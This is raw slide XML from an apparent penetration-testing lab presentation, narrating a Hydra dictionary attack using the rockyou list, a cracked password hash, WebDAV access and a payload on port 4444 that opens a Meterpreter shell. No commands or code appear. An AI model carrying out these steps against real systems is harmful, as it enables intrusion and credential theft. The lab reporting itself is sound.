                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8595600" y="10200"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:rou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pic>
          <p:nvPicPr>
            <p:cNvPr id="22" name="Picture 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5631BC4-D917-4782-8BD2-424E6E6788EA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6630951" y="879783"/>
              <a:ext cx="2032300" cy="1820475"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Shape 326">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E72B5F27-5D72-4C68-A7C5-D334A5917001}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="449880" y="840495"/>
              <a:ext cx="2428541" cy="3154200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="2428541" h="3154200">
                  <a:moveTo>
                    <a:pt x="20" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2023762" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2247304" y="0"/>
                    <a:pt x="2428520" y="181216"/>
                    <a:pt x="2428520" y="404758"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2428541" y="3154180"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2428541" y="3154191"/>
                    <a:pt x="2428531" y="3154200"/>
                    <a:pt x="2428520" y="3154200"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="404778" y="3154200"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="181237" y="3154200"/>
                    <a:pt x="20" y="2972983"/>
                    <a:pt x="20" y="2749442"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="15"/>
                    <a:pt x="2" y="10"/>
                    <a:pt x="6" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="2"/>
                    <a:pt x="15" y="0"/>
                    <a:pt x="20" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F3F3F3"/>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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Rectangle 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D72E587A-217E-4DAB-8F26-645342616209}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="1026436"/>
              <a:ext cx="1678290"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Tools</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="30"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&amp;</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="30"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Processes</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65DAB1F0-3577-4A2D-BA1A-44CD154E212F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="1235987"/>
              <a:ext cx="2540136" cy="237529"/>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Executing</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Hydra</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brute</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force</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82709744-4112-45BA-A7F7-E9F7FE0FD128}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="1445536"/>
              <a:ext cx="2662562"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dictionary</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attack</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bash</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tool</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to</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933310C7-3D58-47BA-BC5F-A7589BE55029}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="1655086"/>
              <a:ext cx="2388117"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get</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password</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for</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Ashton’s</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102F2B2E-B3C1-4D63-9CD7-6B0498F22B44}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="1864636"/>
              <a:ext cx="780364"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account.</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A904AF1D-7D31-4ABD-86DF-3C61C7A63E91}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="671496" y="2282917"/>
              <a:ext cx="2563040" cy="197941"/>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endParaRPr kumimoji="0" lang="en-AU"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0AE8B405-264D-4D4F-AB85-A4F2F8E0CF2D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="2455187"/>
              <a:ext cx="50065" cy="237529"/>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549479F3-0BE7-4E7D-A6C9-9EDD40E57395}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="301687" y="332802"/>
              <a:ext cx="393020" cy="415677"/>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endParaRPr kumimoji="0" lang="en-AU"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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Shape 338">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDC5780C-906F-4F32-8825-EF369F7F7217}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="318969" y="636608"/>
              <a:ext cx="261029" cy="144694"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="261029" h="144694">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="261029" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130515" y="144694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CC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4" name="Shape 339">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{919EC799-87FE-42F4-89A5-271331165EFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2954582" y="247823"/>
              <a:ext cx="533372" cy="476599"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="533372" h="476599">
                  <a:moveTo>
                    <a:pt x="79435" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="453937" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="475004" y="0"/>
                    <a:pt x="495209" y="8369"/>
                    <a:pt x="510106" y="23266"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="525003" y="38163"/>
                    <a:pt x="533372" y="58367"/>
                    <a:pt x="533372" y="79435"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="533372" y="397165"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="533372" y="441035"/>
                    <a:pt x="497808" y="476599"/>
                    <a:pt x="453937" y="476599"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="79435" y="476599"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="35564" y="476599"/>
                    <a:pt x="0" y="441035"/>
                    <a:pt x="0" y="397165"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="79435"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="35564"/>
                    <a:pt x="35564" y="0"/>
                    <a:pt x="79435" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CC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5" name="Rectangle 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CFF6C8D-78BD-4E93-AF8F-23F85F6596FC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3073463" y="332802"/>
              <a:ext cx="393020" cy="415677"/>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21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rPr>
                <a:t>02</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6" name="Shape 341">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{622CBAAC-ABF2-4474-9D76-C17B33BBE5B8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3090745" y="636608"/>
              <a:ext cx="261029" cy="144694"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="261029" h="144694">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="261029" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130515" y="144694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CC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7" name="Rectangle 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E26A8E32-30AF-42D3-BC4E-35935E759CB0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="1026437"/>
              <a:ext cx="1298445"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Achievements</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C1AE0FF1-F405-4FE2-B6F0-4367D05D7C5C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3421331" y="1404638"/>
              <a:ext cx="2336194" cy="6888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rPr>
                <a:t>Password</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="25" normalizeH="0" baseline="0" noProof="0" dirty="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rPr>
                <a:t>for</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="25" normalizeH="0" baseline="0" noProof="0" dirty="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rPr>
                <a:t>Ashton</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="25" normalizeH="0" baseline="0" noProof="0" dirty="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rPr>
                <a:t>was</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="25" normalizeH="0" baseline="0" noProof="0" dirty="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BEC29D50-BA5E-4313-85D7-EBED80FDCA1E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="1243289"/>
              <a:ext cx="2557771" cy="439779"/>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rPr>
                <a:t>found</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="25" normalizeH="0" baseline="0" noProof="0" dirty="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rPr>
                <a:t>in</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="25" normalizeH="0" baseline="0" noProof="0" dirty="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rPr>
                <a:t>‘rockyou’</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="25" normalizeH="0" baseline="0" noProof="0" dirty="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rPr>
                <a:t>dictionary.</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-AU"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8E9BE87E-5687-4E2D-9BDB-C27C812F5B6A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="1864638"/>
              <a:ext cx="2665805"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Access</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to</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the</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/secret_folder/</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1" name="Rectangle 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDBDB264-BEF4-4F4C-BB24-016A0A71EE5D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="2074188"/>
              <a:ext cx="1270879"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was</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achieved.</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2" name="Rectangle 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF35A0BB-D6F7-4575-A948-EAA9A480870F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="2493288"/>
              <a:ext cx="2322445"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Access</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info</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for</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/webdav/</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203CE2F3-A123-4AFD-A24F-D6FD69981222}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="2702838"/>
              <a:ext cx="1698964"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system</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was</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found.</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E0FABB5E-4CA9-4778-B9DA-52190AE48BD8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="3121938"/>
              <a:ext cx="2372712"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Hash</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for</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Ryan’s</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password</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5" name="Rectangle 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE9145F0-8152-47A7-A62F-ABA3942E77C8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5188662" y="3121938"/>
              <a:ext cx="416735"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was</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6" name="Rectangle 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCDBC608-F29A-42A4-A43A-2674D4EA377D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="3331487"/>
              <a:ext cx="2518651"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found</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and</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cracked</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allowing</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B8C0C5D0-F103-480E-96E0-2F32C7A7CC93}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="3541037"/>
              <a:ext cx="1654777" cy="237530"/>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access</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to</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="25" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="12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rPr>
                <a:t>webdav.</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8" name="Shape 355">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D95EBC92-8D63-4091-A0A5-EB7A94478750}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5859707" y="248573"/>
              <a:ext cx="533371" cy="476599"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="533371" h="476599">
                  <a:moveTo>
                    <a:pt x="79435" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="453937" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="475004" y="0"/>
                    <a:pt x="495209" y="8369"/>
                    <a:pt x="510106" y="23266"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="525003" y="38163"/>
                    <a:pt x="533371" y="58367"/>
                    <a:pt x="533371" y="79435"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="533371" y="397164"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="533371" y="441035"/>
                    <a:pt x="497808" y="476599"/>
                    <a:pt x="453937" y="476599"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="79435" y="476599"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="35564" y="476599"/>
                    <a:pt x="0" y="441035"/>
                    <a:pt x="0" y="397164"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="79435"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="35564"/>
                    <a:pt x="35564" y="0"/>
                    <a:pt x="79435" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CC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9" name="Rectangle 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B3D3341-D029-4540-A595-FFB0C712DD6F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5978588" y="333552"/>
              <a:ext cx="393020" cy="415677"/>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AU" sz="21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rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-AU" sz="11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50" name="Shape 357">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83D90E86-D0C9-4F91-AB5C-34E92D967404}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5995870" y="637358"/>
              <a:ext cx="261029" cy="144694"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="261029" h="144694">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="261029" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130515" y="144694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CC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pic>
          <p:nvPicPr>
            <p:cNvPr id="51" name="Picture 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{162C2E94-C9F8-4103-8250-CD9A2E3B5103}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5887665" y="778256"/>
              <a:ext cx="2429256" cy="283464"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="52" name="Picture 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68066421-DEF7-4ABC-8D12-A390EFE67A8E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6065465" y="2441448"/>
              <a:ext cx="1837944" cy="1737360"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B5672D9-6779-40F6-9413-7C49573CFFF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="404846" y="826722"/>
            <a:ext cx="621846" cy="5669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Open ports Vulnerability</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1133" name="Google Shape;1133;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34" name="Google Shape;1134;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US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Slack-Lato"/>
              </a:rPr>
              <a:t>I used port 4444 as my listening port and uploaded the payload to their </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Slack-Lato"/>
              </a:rPr>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Slack-Lato"/>
              </a:rPr>
              <a:t>, simply by clicking on it in their directory their system opened a Meterpreter session for me.</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6" name="Google Shape;1136;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1137" name="Google Shape;1137;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38" name="Google Shape;1138;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63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1140" name="Google Shape;1140;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1" name="Google Shape;1141;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US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Slack-Lato"/>
              </a:rPr>
              <a:t>I was able to gain access to all the files on the remote server through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Slack-Lato"/>
              </a:rPr>
              <a:t>Meterpreter.I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Slack-Lato"/>
              </a:rPr>
              <a:t> opened a shell using terminal commands as their system is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Slack-Lato"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Slack-Lato"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Slack-Lato"/>
              </a:rPr>
              <a:t>based.I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
